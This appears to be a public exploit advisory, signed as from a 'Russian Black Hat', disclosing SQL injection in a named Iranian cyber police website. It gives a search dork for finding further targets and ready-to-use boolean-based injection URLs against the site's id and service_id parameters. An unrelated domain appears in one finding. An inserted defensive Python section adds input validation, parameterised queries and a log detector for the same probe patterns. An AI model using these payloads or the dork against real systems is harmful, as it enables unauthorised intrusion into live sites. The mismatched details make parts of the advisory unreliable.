This site belongs to the Iranian Cyber Police
(پلیس فضای تولید و تبادل اطلاعات فراجا) (FATA), which has a security problem: an SQL injection vulnerability (CWE-89).
We have repeatedly reported to this site that it has a security problem, and it has ignored our report.
We want to record this security issue.
#########################################################################################################################
#
# Exploit Title : "Iranian Cyber Police has an SQL Injection vulnerability."
#                 "Vulners AI Score: 7.8. Confidence level: High."
#
# Author : E1.Coders
#
# Contact : E1.Coders [at] Mail [dot] RU
#
# Portal Link : https://csirc.fata.gov.ir/
#
# Security Risk : Medium
#
# Description : All targets are Iranian military websites
#
# DorK : "inurl:/page/news-details?id=" "site:fata.gov.ir/page/news-details?id="
#
#########################################################################################################################
#
# Expl0iTs:
#
# address (refer url): https://csirc.fata.gov.ir/page/news
#
# vulnerability : GET SQL INJECTION, boolean-based string
#
# action url: https://csirc.fata.gov.ir/page/news-details?id=100014%22
# action url: https://csirc.fata.gov.ir/page/news-details?id=%22100014
# action url: https://csirc.fata.gov.ir/page/news-details?id=100014%27
# --------------------------------------------------
#
# vuln type : SQLInjection
#
# refer address :https://csirc.fata.gov.ir/page/news-details?id=100014
#
# request type : COOKIE
#
# action url : https://csirc.fata.gov.ir/page/news-details?id=100014
# parameter : service_id
#
# description : COOKIE SQL INJECTION, boolean-based string
#
# POC : https://csirc.fata.gov.ir/page/news-details?id=100014&^service_id=9%27) aNd 8634682=8634682 aNd (%276199%27)=(%276199
# --------------------------------------------------
# vuln type : SQLInjection
#
# refer address : https://csirc.fata.gov.ir/page/news-details?id=100014
#
# request type : GET
#
# action url : https://gerdab.ir/fa/archive?sec_id=63&service_id=9
#
# parameter : service_id
#
# description : GET SQL INJECTION, boolean-based integer
#
# POC : https://csirc.fata.gov.ir/page/news-details?id=.&service_id=9 RLIKE (case when 8446715=8446715 then 0x74657374696E70757476616C7565 else 0x28 end)
#
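The two findings above are the same CWE-89 weakness in the numeric id and service_id parameters. As an added example (not code from the advisory author or from the affected site), the following Python shows the defender's side: allow-list validation of the two numeric parameters, queries that bind values instead of concatenating them, and a log check that flags request URLs carrying the boolean-based probe shapes listed in the PoCs (a quote glued to a number, an N=N tautology, RLIKE / CASE WHEN). The table schema, the example.invalid host and the sample request lines are constructed for this example.

```python
"""Hardened news-details lookup plus a request-log check for boolean-based
SQL injection probes. Schema, host name and sample requests are constructed."""
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Allow-list: a news id or service id is a short decimal integer, nothing else.
NUMERIC_ID = re.compile(r"^\d{1,10}$")


def build_demo_db():
    """Constructed in-memory table standing in for the site's news storage."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, service_id INTEGER, title TEXT)")
    con.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(100014, 9, "sample article"), (100015, 9, "another article")],
    )
    con.commit()
    return con


def parse_id(raw):
    """Reject anything that is not a plain integer before it reaches the database."""
    if raw is None or not NUMERIC_ID.fullmatch(raw):
        raise ValueError("invalid id")
    return int(raw)


def news_details(con, raw_id, raw_service_id):
    """Safe handler: validated integers are bound as parameters, never concatenated."""
    news_id = parse_id(raw_id)
    service_id = parse_id(raw_service_id)
    return con.execute(
        "SELECT id, title FROM news WHERE id = ? AND service_id = ?",
        (news_id, service_id),
    ).fetchone()


def find_by_title(con, raw_title):
    """Free-text input is also safe when bound: quotes and tautologies are matched literally."""
    return con.execute("SELECT id FROM news WHERE title = ?", (raw_title,)).fetchone()


# Probe shapes taken from the advisory's PoC URLs, applied to each decoded parameter value.
PROBE_PATTERNS = [
    ("quote glued to numeric value", re.compile(r"""^\d+['"]|^['"]\d+""")),
    ("tautology N=N", re.compile(r"\b(\d+)\s*=\s*\1\b")),
    ("RLIKE / CASE WHEN blind probe", re.compile(r"\brlike\b|\bcase\s+when\b", re.I)),
]


def suspicious_params(url):
    """Return {parameter: reason} for query-string values matching a probe shape."""
    findings = {}
    # parse_qs splits on '&', then on the first '=', and percent-decodes values once.
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for value in values:
            for reason, pattern in PROBE_PATTERNS:
                if pattern.search(value):
                    findings[name] = reason
                    break
    return findings


# Constructed access-log entries with the shapes seen in the advisory; host is a placeholder.
SAMPLE_REQUESTS = [
    "https://www.example.invalid/page/news-details?id=100014",
    "https://www.example.invalid/page/news-details?id=100014%22",
    "https://www.example.invalid/page/news-details?id=100014&service_id=9%27)%20aNd%208634682=8634682%20aNd%20(%276199%27)=(%276199",
    "https://www.example.invalid/page/news-details?id=.&service_id=9%20RLIKE%20(case%20when%208446715=8446715%20then%200x74657374%20else%200x28%20end)",
]


def triage(urls):
    """Pair each URL with its suspicious parameters; clean requests get an empty dict."""
    return [(url, suspicious_params(url)) for url in urls]


if __name__ == "__main__":
    db = build_demo_db()
    print(news_details(db, "100014", "9"))
    for url, hits in triage(SAMPLE_REQUESTS):
        print("ALERT" if hits else "ok   ", hits, url)
```

The handler fails closed on anything that is not an integer, so the quote-suffixed ids and the cookie-style service_id payloads never reach SQL at all; the title lookup shows that even where free text is legitimately needed, binding the value keeps it data rather than query. The log check is deliberately narrow (it keys on the exact shapes in the PoCs) and is meant to confirm whether such probes have already been attempted, not to replace the query fix.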
#########################################################################################################################
#
# | Security Is JOCK |
#
# | Russian Black Hat |
#
#########################################################################################################################